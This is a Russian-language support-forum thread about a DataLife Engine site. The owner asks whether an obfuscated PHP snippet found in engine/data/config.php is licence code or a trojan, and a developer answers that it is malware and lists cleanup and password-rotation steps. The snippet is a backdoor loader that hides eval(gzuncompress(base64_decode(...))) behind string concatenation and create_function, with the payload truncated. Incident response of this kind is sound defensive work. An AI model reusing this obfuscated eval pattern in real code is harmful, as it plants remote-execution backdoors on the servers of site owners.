GizmoN 0 Опубликовано: 11 апреля Рассказать Опубликовано: 11 апреля Всем привет, сегодня на рег ру выдали уведомление о вредоносе в файлах скрипта, в частности вот на это engine/data/config.php $dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6VVftv2zYQ...')));"; $lic_true = "cre"."ate_"."function"; if(@function_exists($lic_true)) { @$dle_conf = $lic_true('', "$dle_lic;"); $dle_conf(''); } Скажите это легальный код или все таки троян? Лицензия был куплена по акции 2 по цене одной, но давно не обновлял Ссылка на сообщение Поделиться на других сайтах
alex32 944 Опубликовано: 11 апреля Рассказать Опубликовано: 11 апреля 1 час назад, GizmoN сказал: в частности вот на это engine/data/config.php в этом файле такого кода точно нет. в нем только массив с настройками хранится. Ссылка на сообщение Поделиться на других сайтах
celsoft 6223 Опубликовано: 11 апреля Рассказать Опубликовано: 11 апреля 1 час назад, GizmoN сказал: кажите это легальный код или все таки троян? Лицензия был куплена по акции 2 по цене одной, но давно не обновлял Нет. Это не легальный код. К лицензии не имеет и не может иметь никакого отношения. Это точно вредоносный код, полученный вами из вне. Вам нужно менять все пароли. Как к своему аккаунту на сайте в DLE, так и другие непосредственно к серверу, базе данных, по FTP, хостингу и т.д. то есть все. А также проверить сайт на наличие шеллов. Для удаления на сервере со стороны DLE нужно сделать следующее: 1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива. 2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/ 3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения, антивирус проверяет все папки если нажать на "Провести тщательное сканирование". Удалять нужно все, на что он указывает. 4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения. 5. Изменить все пароли, как к хостингу, так и к DLE. 6. Удалить в админпанели всех администраторов кроме себя. 7. Проверьте все свои файлы шаблона, удалите все неизвестные и посторонние JS скрипты, рекламные коды и скрипты. 8. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения. Со стороны сервера: Полностью обновить все серверное ПО и сменить все без исключения пароли. Изучение логов сервера, на предмет кто с каких IP заходил на шелл на сервере, что делал до этого на сервере и куда заходил. Какая активность была перед появлением шелла на сервере в принципе. Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Создайте аккаунт или войдите в него для комментирования
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйтесь для получения аккаунта. Это просто!
Зарегистрировать аккаунтВойти
Уже зарегистрированы? Войдите здесь.
Войти сейчас